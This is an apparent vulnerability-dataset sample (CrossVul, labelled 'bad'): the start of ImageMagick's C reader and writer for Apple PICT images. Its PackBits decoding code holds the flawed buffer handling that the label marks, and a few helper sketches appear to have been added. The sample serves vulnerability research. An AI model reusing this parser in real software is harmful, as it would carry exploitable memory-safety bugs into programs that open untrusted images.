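  return(SyncImageProfiles(image));      /* rewrite resolution & orientation */
}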
| ./CrossVul/dataset_final_sorted/CWE-190/c/good_5177_0 |
crossvul-cpp_data_bad_1834_6 | /*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% PPPP IIIII CCCC TTTTT %
% P P I C T %
% PPPP I C T %
% P I C T %
% P IIIII CCCC T %
% %
% %
% Read/Write Apple Macintosh QuickDraw/PICT Format %
% %
% Software Design %
% Cristy %
% July 1992 %
% %
% %
% Copyright 1999-2015 ImageMagick Studio LLC, a non-profit organization %
% dedicated to making software imaging solutions freely available. %
% %
% You may not use this file except in compliance with the License. You may %
% obtain a copy of the License at %
% %
% http://www.imagemagick.org/script/license.php %
% %
% Unless required by applicable law or agreed to in writing, software %
% distributed under the License is distributed on an "AS IS" BASIS, %
% WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. %
% See the License for the specific language governing permissions and %
% limitations under the License. %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
%
*/
/*
Include declarations.
*/
#include "MagickCore/studio.h"
#include "MagickCore/blob.h"
#include "MagickCore/blob-private.h"
#include "MagickCore/cache.h"
#include "MagickCore/color-private.h"
#include "MagickCore/colormap.h"
#include "MagickCore/colormap-private.h"
#include "MagickCore/colorspace.h"
#include "MagickCore/colorspace-private.h"
#include "MagickCore/composite.h"
#include "MagickCore/constitute.h"
#include "MagickCore/exception.h"
#include "MagickCore/exception-private.h"
#include "MagickCore/image.h"
#include "MagickCore/image-private.h"
#include "MagickCore/list.h"
#include "MagickCore/log.h"
#include "MagickCore/magick.h"
#include "MagickCore/memory_.h"
#include "MagickCore/monitor.h"
#include "MagickCore/monitor-private.h"
#include "MagickCore/pixel-accessor.h"
#include "MagickCore/profile.h"
#include "MagickCore/resource_.h"
#include "MagickCore/quantum-private.h"
#include "MagickCore/static.h"
#include "MagickCore/string_.h"
#include "MagickCore/module.h"
#include "MagickCore/transform.h"
#include "MagickCore/utility.h"
/*
ImageMagick Macintosh PICT Methods.
*/
#define ReadPixmap(pixmap) \
{ \
pixmap.version=(short) ReadBlobMSBShort(image); \
pixmap.pack_type=(short) ReadBlobMSBShort(image); \
pixmap.pack_size=ReadBlobMSBLong(image); \
pixmap.horizontal_resolution=1UL*ReadBlobMSBShort(image); \
(void) ReadBlobMSBShort(image); \
pixmap.vertical_resolution=1UL*ReadBlobMSBShort(image); \
(void) ReadBlobMSBShort(image); \
pixmap.pixel_type=(short) ReadBlobMSBShort(image); \
pixmap.bits_per_pixel=(short) ReadBlobMSBShort(image); \
pixmap.component_count=(short) ReadBlobMSBShort(image); \
pixmap.component_size=(short) ReadBlobMSBShort(image); \
pixmap.plane_bytes=ReadBlobMSBLong(image); \
pixmap.table=ReadBlobMSBLong(image); \
pixmap.reserved=ReadBlobMSBLong(image); \
if ((EOFBlob(image) != MagickFalse) || (pixmap.bits_per_pixel <= 0) || \
(pixmap.bits_per_pixel > 32) || (pixmap.component_count <= 0) || \
(pixmap.component_count > 4) || (pixmap.component_size <= 0)) \
ThrowReaderException(CorruptImageError,"ImproperImageHeader"); \
}
typedef struct _PICTCode
{
const char
*name;
ssize_t
length;
const char
*description;
} PICTCode;
typedef struct _PICTPixmap
{
short
version,
pack_type;
size_t
pack_size,
horizontal_resolution,
vertical_resolution;
short
pixel_type,
bits_per_pixel,
component_count,
component_size;
size_t
plane_bytes,
table,
reserved;
} PICTPixmap;
typedef struct _PICTRectangle
{
short
top,
left,
bottom,
right;
} PICTRectangle;
static const PICTCode
codes[] =
{
/* 0x00 */ { "NOP", 0, "nop" },
/* 0x01 */ { "Clip", 0, "clip" },
/* 0x02 */ { "BkPat", 8, "background pattern" },
/* 0x03 */ { "TxFont", 2, "text font (word)" },
/* 0x04 */ { "TxFace", 1, "text face (byte)" },
/* 0x05 */ { "TxMode", 2, "text mode (word)" },
/* 0x06 */ { "SpExtra", 4, "space extra (fixed point)" },
/* 0x07 */ { "PnSize", 4, "pen size (point)" },
/* 0x08 */ { "PnMode", 2, "pen mode (word)" },
/* 0x09 */ { "PnPat", 8, "pen pattern" },
/* 0x0a */ { "FillPat", 8, "fill pattern" },
/* 0x0b */ { "OvSize", 4, "oval size (point)" },
/* 0x0c */ { "Origin", 4, "dh, dv (word)" },
/* 0x0d */ { "TxSize", 2, "text size (word)" },
/* 0x0e */ { "FgColor", 4, "foreground color (ssize_tword)" },
/* 0x0f */ { "BkColor", 4, "background color (ssize_tword)" },
/* 0x10 */ { "TxRatio", 8, "numerator (point), denominator (point)" },
/* 0x11 */ { "Version", 1, "version (byte)" },
/* 0x12 */ { "BkPixPat", 0, "color background pattern" },
/* 0x13 */ { "PnPixPat", 0, "color pen pattern" },
/* 0x14 */ { "FillPixPat", 0, "color fill pattern" },
/* 0x15 */ { "PnLocHFrac", 2, "fractional pen position" },
/* 0x16 */ { "ChExtra", 2, "extra for each character" },
/* 0x17 */ { "reserved", 0, "reserved for Apple use" },
/* 0x18 */ { "reserved", 0, "reserved for Apple use" },
/* 0x19 */ { "reserved", 0, "reserved for Apple use" },
/* 0x1a */ { "RGBFgCol", 6, "RGB foreColor" },
/* 0x1b */ { "RGBBkCol", 6, "RGB backColor" },
/* 0x1c */ { "HiliteMode", 0, "hilite mode flag" },
/* 0x1d */ { "HiliteColor", 6, "RGB hilite color" },
/* 0x1e */ { "DefHilite", 0, "Use default hilite color" },
/* 0x1f */ { "OpColor", 6, "RGB OpColor for arithmetic modes" },
/* 0x20 */ { "Line", 8, "pnLoc (point), newPt (point)" },
/* 0x21 */ { "LineFrom", 4, "newPt (point)" },
/* 0x22 */ { "ShortLine", 6, "pnLoc (point, dh, dv (-128 .. 127))" },
/* 0x23 */ { "ShortLineFrom", 2, "dh, dv (-128 .. 127)" },
/* 0x24 */ { "reserved", -1, "reserved for Apple use" },
/* 0x25 */ { "reserved", -1, "reserved for Apple use" },
/* 0x26 */ { "reserved", -1, "reserved for Apple use" },
/* 0x27 */ { "reserved", -1, "reserved for Apple use" },
/* 0x28 */ { "LongText", 0, "txLoc (point), count (0..255), text" },
/* 0x29 */ { "DHText", 0, "dh (0..255), count (0..255), text" },
/* 0x2a */ { "DVText", 0, "dv (0..255), count (0..255), text" },
/* 0x2b */ { "DHDVText", 0, "dh, dv (0..255), count (0..255), text" },
/* 0x2c */ { "reserved", -1, "reserved for Apple use" },
/* 0x2d */ { "reserved", -1, "reserved for Apple use" },
/* 0x2e */ { "reserved", -1, "reserved for Apple use" },
/* 0x2f */ { "reserved", -1, "reserved for Apple use" },
/* 0x30 */ { "frameRect", 8, "rect" },
/* 0x31 */ { "paintRect", 8, "rect" },
/* 0x32 */ { "eraseRect", 8, "rect" },
/* 0x33 */ { "invertRect", 8, "rect" },
/* 0x34 */ { "fillRect", 8, "rect" },
/* 0x35 */ { "reserved", 8, "reserved for Apple use" },
/* 0x36 */ { "reserved", 8, "reserved for Apple use" },
/* 0x37 */ { "reserved", 8, "reserved for Apple use" },
/* 0x38 */ { "frameSameRect", 0, "rect" },
/* 0x39 */ { "paintSameRect", 0, "rect" },
/* 0x3a */ { "eraseSameRect", 0, "rect" },
/* 0x3b */ { "invertSameRect", 0, "rect" },
/* 0x3c */ { "fillSameRect", 0, "rect" },
/* 0x3d */ { "reserved", 0, "reserved for Apple use" },
/* 0x3e */ { "reserved", 0, "reserved for Apple use" },
/* 0x3f */ { "reserved", 0, "reserved for Apple use" },
/* 0x40 */ { "frameRRect", 8, "rect" },
/* 0x41 */ { "paintRRect", 8, "rect" },
/* 0x42 */ { "eraseRRect", 8, "rect" },
/* 0x43 */ { "invertRRect", 8, "rect" },
/* 0x44 */ { "fillRRrect", 8, "rect" },
/* 0x45 */ { "reserved", 8, "reserved for Apple use" },
/* 0x46 */ { "reserved", 8, "reserved for Apple use" },
/* 0x47 */ { "reserved", 8, "reserved for Apple use" },
/* 0x48 */ { "frameSameRRect", 0, "rect" },
/* 0x49 */ { "paintSameRRect", 0, "rect" },
/* 0x4a */ { "eraseSameRRect", 0, "rect" },
/* 0x4b */ { "invertSameRRect", 0, "rect" },
/* 0x4c */ { "fillSameRRect", 0, "rect" },
/* 0x4d */ { "reserved", 0, "reserved for Apple use" },
/* 0x4e */ { "reserved", 0, "reserved for Apple use" },
/* 0x4f */ { "reserved", 0, "reserved for Apple use" },
/* 0x50 */ { "frameOval", 8, "rect" },
/* 0x51 */ { "paintOval", 8, "rect" },
/* 0x52 */ { "eraseOval", 8, "rect" },
/* 0x53 */ { "invertOval", 8, "rect" },
/* 0x54 */ { "fillOval", 8, "rect" },
/* 0x55 */ { "reserved", 8, "reserved for Apple use" },
/* 0x56 */ { "reserved", 8, "reserved for Apple use" },
/* 0x57 */ { "reserved", 8, "reserved for Apple use" },
/* 0x58 */ { "frameSameOval", 0, "rect" },
/* 0x59 */ { "paintSameOval", 0, "rect" },
/* 0x5a */ { "eraseSameOval", 0, "rect" },
/* 0x5b */ { "invertSameOval", 0, "rect" },
/* 0x5c */ { "fillSameOval", 0, "rect" },
/* 0x5d */ { "reserved", 0, "reserved for Apple use" },
/* 0x5e */ { "reserved", 0, "reserved for Apple use" },
/* 0x5f */ { "reserved", 0, "reserved for Apple use" },
/* 0x60 */ { "frameArc", 12, "rect, startAngle, arcAngle" },
/* 0x61 */ { "paintArc", 12, "rect, startAngle, arcAngle" },
/* 0x62 */ { "eraseArc", 12, "rect, startAngle, arcAngle" },
/* 0x63 */ { "invertArc", 12, "rect, startAngle, arcAngle" },
/* 0x64 */ { "fillArc", 12, "rect, startAngle, arcAngle" },
/* 0x65 */ { "reserved", 12, "reserved for Apple use" },
/* 0x66 */ { "reserved", 12, "reserved for Apple use" },
/* 0x67 */ { "reserved", 12, "reserved for Apple use" },
/* 0x68 */ { "frameSameArc", 4, "rect, startAngle, arcAngle" },
/* 0x69 */ { "paintSameArc", 4, "rect, startAngle, arcAngle" },
/* 0x6a */ { "eraseSameArc", 4, "rect, startAngle, arcAngle" },
/* 0x6b */ { "invertSameArc", 4, "rect, startAngle, arcAngle" },
/* 0x6c */ { "fillSameArc", 4, "rect, startAngle, arcAngle" },
/* 0x6d */ { "reserved", 4, "reserved for Apple use" },
/* 0x6e */ { "reserved", 4, "reserved for Apple use" },
/* 0x6f */ { "reserved", 4, "reserved for Apple use" },
/* 0x70 */ { "framePoly", 0, "poly" },
/* 0x71 */ { "paintPoly", 0, "poly" },
/* 0x72 */ { "erasePoly", 0, "poly" },
/* 0x73 */ { "invertPoly", 0, "poly" },
/* 0x74 */ { "fillPoly", 0, "poly" },
/* 0x75 */ { "reserved", 0, "reserved for Apple use" },
/* 0x76 */ { "reserved", 0, "reserved for Apple use" },
/* 0x77 */ { "reserved", 0, "reserved for Apple use" },
/* 0x78 */ { "frameSamePoly", 0, "poly (NYI)" },
/* 0x79 */ { "paintSamePoly", 0, "poly (NYI)" },
/* 0x7a */ { "eraseSamePoly", 0, "poly (NYI)" },
/* 0x7b */ { "invertSamePoly", 0, "poly (NYI)" },
/* 0x7c */ { "fillSamePoly", 0, "poly (NYI)" },
/* 0x7d */ { "reserved", 0, "reserved for Apple use" },
/* 0x7e */ { "reserved", 0, "reserved for Apple use" },
/* 0x7f */ { "reserved", 0, "reserved for Apple use" },
/* 0x80 */ { "frameRgn", 0, "region" },
/* 0x81 */ { "paintRgn", 0, "region" },
/* 0x82 */ { "eraseRgn", 0, "region" },
/* 0x83 */ { "invertRgn", 0, "region" },
/* 0x84 */ { "fillRgn", 0, "region" },
/* 0x85 */ { "reserved", 0, "reserved for Apple use" },
/* 0x86 */ { "reserved", 0, "reserved for Apple use" },
/* 0x87 */ { "reserved", 0, "reserved for Apple use" },
/* 0x88 */ { "frameSameRgn", 0, "region (NYI)" },
/* 0x89 */ { "paintSameRgn", 0, "region (NYI)" },
/* 0x8a */ { "eraseSameRgn", 0, "region (NYI)" },
/* 0x8b */ { "invertSameRgn", 0, "region (NYI)" },
/* 0x8c */ { "fillSameRgn", 0, "region (NYI)" },
/* 0x8d */ { "reserved", 0, "reserved for Apple use" },
/* 0x8e */ { "reserved", 0, "reserved for Apple use" },
/* 0x8f */ { "reserved", 0, "reserved for Apple use" },
/* 0x90 */ { "BitsRect", 0, "copybits, rect clipped" },
/* 0x91 */ { "BitsRgn", 0, "copybits, rgn clipped" },
/* 0x92 */ { "reserved", -1, "reserved for Apple use" },
/* 0x93 */ { "reserved", -1, "reserved for Apple use" },
/* 0x94 */ { "reserved", -1, "reserved for Apple use" },
/* 0x95 */ { "reserved", -1, "reserved for Apple use" },
/* 0x96 */ { "reserved", -1, "reserved for Apple use" },
/* 0x97 */ { "reserved", -1, "reserved for Apple use" },
/* 0x98 */ { "PackBitsRect", 0, "packed copybits, rect clipped" },
/* 0x99 */ { "PackBitsRgn", 0, "packed copybits, rgn clipped" },
/* 0x9a */ { "DirectBitsRect", 0, "PixMap, srcRect, dstRect, mode, PixData" },
/* 0x9b */ { "DirectBitsRgn", 0, "PixMap, srcRect, dstRect, mode, maskRgn, PixData" },
/* 0x9c */ { "reserved", -1, "reserved for Apple use" },
/* 0x9d */ { "reserved", -1, "reserved for Apple use" },
/* 0x9e */ { "reserved", -1, "reserved for Apple use" },
/* 0x9f */ { "reserved", -1, "reserved for Apple use" },
/* 0xa0 */ { "ShortComment", 2, "kind (word)" },
/* 0xa1 */ { "LongComment", 0, "kind (word), size (word), data" }
};
/*
Forward declarations.
*/
static MagickBooleanType
WritePICTImage(const ImageInfo *,Image *,ExceptionInfo *);
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% D e c o d e I m a g e %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% DecodeImage decompresses an image via Macintosh pack bits decoding for
% Macintosh PICT images.
%
% The format of the DecodeImage method is:
%
% unsigned char *DecodeImage(Image *blob,Image *image,
% size_t bytes_per_line,const unsigned int bits_per_pixel,
% size_t *extent,ExceptionInfo *exception)
%
% A description of each parameter follows:
%
% o blob,image: the address of a structure of type Image.
%
% o bytes_per_line: This integer identifies the number of bytes in a
% scanline.
%
% o bits_per_pixel: the number of bits in a pixel.
%
% o extent: returns the number of bytes allocated for the pixel buffer.
%
% o exception: return any errors or warnings in this structure.
%
*/
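/*
  Minimal standalone sketch of the PackBits rule that DecodeImage() relies
  on; it is not part of the original coder.  A control byte below 0x80 is
  followed by control+1 literal bytes, 0x80 is a no-op, and anything above
  0x80 repeats the next byte 257-control times.  Buffer names are
  hypothetical.
*/
static size_t UnpackBitsSketch(const unsigned char *packed,
  const size_t packed_length,unsigned char *unpacked,
  const size_t unpacked_length)
{
  size_t
    count,
    i,
    j;

  unsigned char
    control;

  i=0;
  j=0;
  while (i < packed_length)
  {
    control=packed[i++];
    if (control < 0x80)
      {
        count=(size_t) control+1;            /* literal run */
        if (((i+count) > packed_length) || ((j+count) > unpacked_length))
          break;
        (void) CopyMagickMemory(unpacked+j,packed+i,count);
        i+=count;
        j+=count;
      }
    else
      if (control != 0x80)                   /* 0x80 is a no-op */
        {
          count=257-(size_t) control;        /* repeated run */
          if ((i >= packed_length) || ((j+count) > unpacked_length))
            break;
          (void) ResetMagickMemory(unpacked+j,(int) packed[i++],count);
          j+=count;
        }
  }
  return(j);                                 /* bytes produced */
}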
static unsigned char *ExpandBuffer(unsigned char *pixels,
MagickSizeType *bytes_per_line,const unsigned int bits_per_pixel)
{
register ssize_t
i;
register unsigned char
*p,
*q;
static unsigned char
scanline[8*256];
p=pixels;
q=scanline;
switch (bits_per_pixel)
{
case 8:
case 16:
case 32:
return(pixels);
case 4:
{
for (i=0; i < (ssize_t) *bytes_per_line; i++)
{
*q++=(*p >> 4) & 0xff;
*q++=(*p & 15);
p++;
}
*bytes_per_line*=2;
break;
}
case 2:
{
for (i=0; i < (ssize_t) *bytes_per_line; i++)
{
*q++=(*p >> 6) & 0x03;
*q++=(*p >> 4) & 0x03;
*q++=(*p >> 2) & 0x03;
*q++=(*p & 3);
p++;
}
*bytes_per_line*=4;
break;
}
case 1:
{
for (i=0; i < (ssize_t) *bytes_per_line; i++)
{
*q++=(*p >> 7) & 0x01;
*q++=(*p >> 6) & 0x01;
*q++=(*p >> 5) & 0x01;
*q++=(*p >> 4) & 0x01;
*q++=(*p >> 3) & 0x01;
*q++=(*p >> 2) & 0x01;
*q++=(*p >> 1) & 0x01;
*q++=(*p & 0x01);
p++;
}
*bytes_per_line*=8;
break;
}
default:
break;
}
return(scanline);
}
static unsigned char *DecodeImage(Image *blob,Image *image,
size_t bytes_per_line,const unsigned int bits_per_pixel,size_t *extent,
ExceptionInfo *exception)
{
MagickSizeType
number_pixels;
register ssize_t
i;
register unsigned char
*p,
*q;
size_t
bytes_per_pixel,
length,
row_bytes,
scanline_length,
width;
ssize_t
count,
j,
y;
unsigned char
*pixels,
*scanline;
/*
Determine pixel buffer size.
*/
if (bits_per_pixel <= 8)
bytes_per_line&=0x7fff;
width=image->columns;
bytes_per_pixel=1;
if (bits_per_pixel == 16)
{
bytes_per_pixel=2;
width*=2;
}
else
if (bits_per_pixel == 32)
width*=image->alpha_trait ? 4 : 3;
if (bytes_per_line == 0)
bytes_per_line=width;
row_bytes=(size_t) (image->columns | 0x8000);
if (image->storage_class == DirectClass)
row_bytes=(size_t) ((4*image->columns) | 0x8000);
/*
Allocate pixel and scanline buffer.
*/
pixels=(unsigned char *) AcquireQuantumMemory(image->rows,row_bytes*
sizeof(*pixels));
if (pixels == (unsigned char *) NULL)
return((unsigned char *) NULL);
*extent=row_bytes*image->rows*sizeof(*pixels);
(void) ResetMagickMemory(pixels,0,*extent);
scanline=(unsigned char *) AcquireQuantumMemory(row_bytes,2*
sizeof(*scanline));
if (scanline == (unsigned char *) NULL)
return((unsigned char *) NULL);
if (bytes_per_line < 8)
{
/*
Pixels are already uncompressed.
*/
for (y=0; y < (ssize_t) image->rows; y++)
{
q=pixels+y*width*GetPixelChannels(image);
number_pixels=bytes_per_line;
count=ReadBlob(blob,(size_t) number_pixels,scanline);
if (count != (ssize_t) number_pixels)
{
(void) ThrowMagickException(exception,GetMagickModule(),
CorruptImageError,"UnableToUncompressImage","`%s'",
image->filename);
break;
}
p=ExpandBuffer(scanline,&number_pixels,bits_per_pixel);
if ((q+number_pixels) > (pixels+(*extent)))
{
(void) ThrowMagickException(exception,GetMagickModule(),
CorruptImageError,"UnableToUncompressImage","`%s'",
image->filename);
break;
}
(void) CopyMagickMemory(q,p,(size_t) number_pixels);
}
scanline=(unsigned char *) RelinquishMagickMemory(scanline);
return(pixels);
}
/*
Uncompress RLE pixels into uncompressed pixel buffer.
*/
for (y=0; y < (ssize_t) image->rows; y++)
{
q=pixels+y*width;
if (bytes_per_line > 200)
scanline_length=ReadBlobMSBShort(blob);
else
scanline_length=1UL*ReadBlobByte(blob);
if (scanline_length >= row_bytes)
{
(void) ThrowMagickException(exception,GetMagickModule(),
CorruptImageError,"UnableToUncompressImage","`%s'",image->filename);
break;
}
count=ReadBlob(blob,scanline_length,scanline);
if (count != (ssize_t) scanline_length)
{
(void) ThrowMagickException(exception,GetMagickModule(),
CorruptImageError,"UnableToUncompressImage","`%s'",image->filename);
break;
}
for (j=0; j < (ssize_t) scanline_length; )
if ((scanline[j] & 0x80) == 0)
{
length=(size_t) ((scanline[j] & 0xff)+1);
number_pixels=length*bytes_per_pixel;
p=ExpandBuffer(scanline+j+1,&number_pixels,bits_per_pixel);
if ((q-pixels+number_pixels) <= *extent)
(void) CopyMagickMemory(q,p,(size_t) number_pixels);
q+=number_pixels;
j+=(ssize_t) (length*bytes_per_pixel+1);
}
else
{
length=(size_t) (((scanline[j] ^ 0xff) & 0xff)+2);
number_pixels=bytes_per_pixel;
p=ExpandBuffer(scanline+j+1,&number_pixels,bits_per_pixel);
for (i=0; i < (ssize_t) length; i++)
{
if ((q-pixels+number_pixels) <= *extent)
(void) CopyMagickMemory(q,p,(size_t) number_pixels);
q+=number_pixels;
}
j+=(ssize_t) bytes_per_pixel+1;
}
}
scanline=(unsigned char *) RelinquishMagickMemory(scanline);
return(pixels);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% E n c o d e I m a g e %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% EncodeImage compresses an image via Macintosh pack bits encoding
% for Macintosh PICT images.
%
% The format of the EncodeImage method is:
%
% size_t EncodeImage(Image *image,const unsigned char *scanline,
% const size_t bytes_per_line,unsigned char *pixels)
%
% A description of each parameter follows:
%
% o image: the address of a structure of type Image.
%
% o scanline: A pointer to an array of characters to pack.
%
% o bytes_per_line: the number of bytes in a scanline.
%
% o pixels: A pointer to an array of characters where the packed
% characters are stored.
%
*/
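/*
  Tiny forward-order sketch of the run emission used by EncodeImage(); it is
  not part of the original coder.  A run of `count' identical bytes (3..128)
  is written as the control byte 257-count followed by the byte to repeat;
  shorter stretches fall back to a literal run behind a control byte of
  count-1.  EncodeImage() itself builds its buffer back to front and flips
  it when writing, which is why the order there looks reversed.
*/
static size_t PackRunSketch(const unsigned char value,const size_t count,
  unsigned char *q)
{
  if ((count < 3) || (count > 128))
    return(0);                       /* caller emits a literal run instead */
  *q++=(unsigned char) (257-count);  /* repeat-count control byte */
  *q=value;                          /* the byte to repeat */
  return(2);
}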
static size_t EncodeImage(Image *image,const unsigned char *scanline,
const size_t bytes_per_line,unsigned char *pixels)
{
#define MaxCount 128
#define MaxPackbitsRunlength 128
register const unsigned char
*p;
register ssize_t
i;
register unsigned char
*q;
size_t
length;
ssize_t
count,
repeat_count,
runlength;
unsigned char
index;
/*
Pack scanline.
*/
assert(image != (Image *) NULL);
assert(image->signature == MagickSignature);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename);
assert(scanline != (unsigned char *) NULL);
assert(pixels != (unsigned char *) NULL);
count=0;
runlength=0;
p=scanline+(bytes_per_line-1);
q=pixels;
index=(*p);
for (i=(ssize_t) bytes_per_line-1; i >= 0; i--)
{
if (index == *p)
runlength++;
else
{
if (runlength < 3)
while (runlength > 0)
{
*q++=(unsigned char) index;
runlength--;
count++;
if (count == MaxCount)
{
*q++=(unsigned char) (MaxCount-1);
count-=MaxCount;
}
}
else
{
if (count > 0)
*q++=(unsigned char) (count-1);
count=0;
while (runlength > 0)
{
repeat_count=runlength;
if (repeat_count > MaxPackbitsRunlength)
repeat_count=MaxPackbitsRunlength;
*q++=(unsigned char) index;
*q++=(unsigned char) (257-repeat_count);
runlength-=repeat_count;
}
}
runlength=1;
}
index=(*p);
p--;
}
if (runlength < 3)
while (runlength > 0)
{
*q++=(unsigned char) index;
runlength--;
count++;
if (count == MaxCount)
{
*q++=(unsigned char) (MaxCount-1);
count-=MaxCount;
}
}
else
{
if (count > 0)
*q++=(unsigned char) (count-1);
count=0;
while (runlength > 0)
{
repeat_count=runlength;
if (repeat_count > MaxPackbitsRunlength)
repeat_count=MaxPackbitsRunlength;
*q++=(unsigned char) index;
*q++=(unsigned char) (257-repeat_count);
runlength-=repeat_count;
}
}
if (count > 0)
*q++=(unsigned char) (count-1);
/*
Write the packed scanline length, then the packed scanline itself.
*/
length=(size_t) (q-pixels);
if (bytes_per_line > 200)
{
(void) WriteBlobMSBShort(image,(unsigned short) length);
length+=2;
}
else
{
(void) WriteBlobByte(image,(unsigned char) length);
length++;
}
while (q != pixels)
{
q--;
(void) WriteBlobByte(image,*q);
}
return(length);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% I s P I C T %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% IsPICT() returns MagickTrue if the image format type, identified by the
% magick string, is PICT.
%
% The format of the IsPICT method is:
%
% MagickBooleanType IsPICT(const unsigned char *magick,const size_t length)
%
% A description of each parameter follows:
%
% o magick: compare image format pattern against these bytes.
%
% o length: Specifies the length of the magick string.
%
*/
static MagickBooleanType IsPICT(const unsigned char *magick,const size_t length)
{
if (length < 12)
return(MagickFalse);
/*
Embedded OLE2 Macintosh files have "PICT" instead of the 512-byte platform header.
*/
if (memcmp(magick,"PICT",4) == 0)
return(MagickTrue);
if (length < 528)
return(MagickFalse);
if (memcmp(magick+522,"\000\021\002\377\014\000",6) == 0)
return(MagickTrue);
return(MagickFalse);
}
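/*
  Hedged usage sketch, not part of the original coder: probe a file on disk
  with IsPICT() by reading just enough header bytes (the 512-byte pad plus
  the signature).  The path handling is hypothetical; IsPICT() itself only
  inspects the buffer it is given.
*/
static MagickBooleanType ProbePictFileSketch(const char *path)
{
  FILE
    *file;

  size_t
    count;

  unsigned char
    header[528];

  file=fopen(path,"rb");
  if (file == (FILE *) NULL)
    return(MagickFalse);
  count=fread(header,1,sizeof(header),file);
  (void) fclose(file);
  return(IsPICT(header,count));
}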
#if !defined(macintosh)
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% R e a d P I C T I m a g e %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% ReadPICTImage() reads an Apple Macintosh QuickDraw/PICT image file
% and returns it. It allocates the memory necessary for the new Image
% structure and returns a pointer to the new image.
%
% The format of the ReadPICTImage method is:
%
% Image *ReadPICTImage(const ImageInfo *image_info,
% ExceptionInfo *exception)
%
% A description of each parameter follows:
%
% o image_info: the image info.
%
% o exception: return any errors or warnings in this structure.
%
*/
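/*
  Hedged usage sketch, not part of the original coder: PICT files are
  normally read through the generic ReadImage() entry point, which
  dispatches to ReadPICTImage() via the registration further below.  The
  filename argument is hypothetical.
*/
static Image *ReadPictViaGenericApiSketch(const char *filename,
  ExceptionInfo *exception)
{
  Image
    *image;

  ImageInfo
    *read_info;

  read_info=CloneImageInfo((ImageInfo *) NULL);   /* default-initialized */
  (void) CopyMagickString(read_info->filename,filename,MagickPathExtent);
  image=ReadImage(read_info,exception);           /* dispatches on the magick */
  read_info=DestroyImageInfo(read_info);
  return(image);
}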
static MagickBooleanType ReadRectangle(Image *image,PICTRectangle *rectangle)
{
rectangle->top=(short) ReadBlobMSBShort(image);
rectangle->left=(short) ReadBlobMSBShort(image);
rectangle->bottom=(short) ReadBlobMSBShort(image);
rectangle->right=(short) ReadBlobMSBShort(image);
if ((EOFBlob(image) != MagickFalse) || (rectangle->left > rectangle->right) ||
(rectangle->top > rectangle->bottom))
return(MagickFalse);
return(MagickTrue);
}
static Image *ReadPICTImage(const ImageInfo *image_info,
ExceptionInfo *exception)
{
char
geometry[MagickPathExtent],
header_ole[4];
Image
*image;
int
c,
code;
MagickBooleanType
jpeg,
status;
PICTRectangle
frame;
PICTPixmap
pixmap;
Quantum
index;
register Quantum
*q;
register ssize_t
i,
x;
size_t
extent,
length;
ssize_t
count,
flags,
j,
version,
y;
StringInfo
*profile;
/*
Open image file.
*/
assert(image_info != (const ImageInfo *) NULL);
assert(image_info->signature == MagickSignature);
if (image_info->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",
image_info->filename);
assert(exception != (ExceptionInfo *) NULL);
assert(exception->signature == MagickSignature);
image=AcquireImage(image_info,exception);
status=OpenBlob(image_info,image,ReadBinaryBlobMode,exception);
if (status == MagickFalse)
{
image=DestroyImageList(image);
return((Image *) NULL);
}
/*
Read PICT header.
*/
pixmap.bits_per_pixel=0;
pixmap.component_count=0;
/*
Skip the header: 512 bytes for a standard PICT, 4 bytes (i.e. "PICT") for OLE2.
*/
header_ole[0]=ReadBlobByte(image);
header_ole[1]=ReadBlobByte(image);
header_ole[2]=ReadBlobByte(image);
header_ole[3]=ReadBlobByte(image);
if (!((header_ole[0] == 0x50) && (header_ole[1] == 0x49) &&
(header_ole[2] == 0x43) && (header_ole[3] == 0x54 )))
for (i=0; i < 508; i++)
if (ReadBlobByte(image) == EOF)
break;
(void) ReadBlobMSBShort(image); /* skip picture size */
if (ReadRectangle(image,&frame) == MagickFalse)
ThrowReaderException(CorruptImageError,"ImproperImageHeader");
while ((c=ReadBlobByte(image)) == 0) ;
if (c != 0x11)
ThrowReaderException(CorruptImageError,"ImproperImageHeader");
version=ReadBlobByte(image);
if (version == 2)
{
c=ReadBlobByte(image);
if (c != 0xff)
ThrowReaderException(CorruptImageError,"ImproperImageHeader");
}
else
if (version != 1)
ThrowReaderException(CorruptImageError,"ImproperImageHeader");
if ((frame.left < 0) || (frame.right < 0) || (frame.top < 0) ||
(frame.bottom < 0) || (frame.left >= frame.right) ||
(frame.top >= frame.bottom))
ThrowReaderException(CorruptImageError,"ImproperImageHeader");
/*
Create black canvas.
*/
flags=0;
image->depth=8;
image->columns=1UL*(frame.right-frame.left);
image->rows=1UL*(frame.bottom-frame.top);
image->resolution.x=DefaultResolution;
image->resolution.y=DefaultResolution;
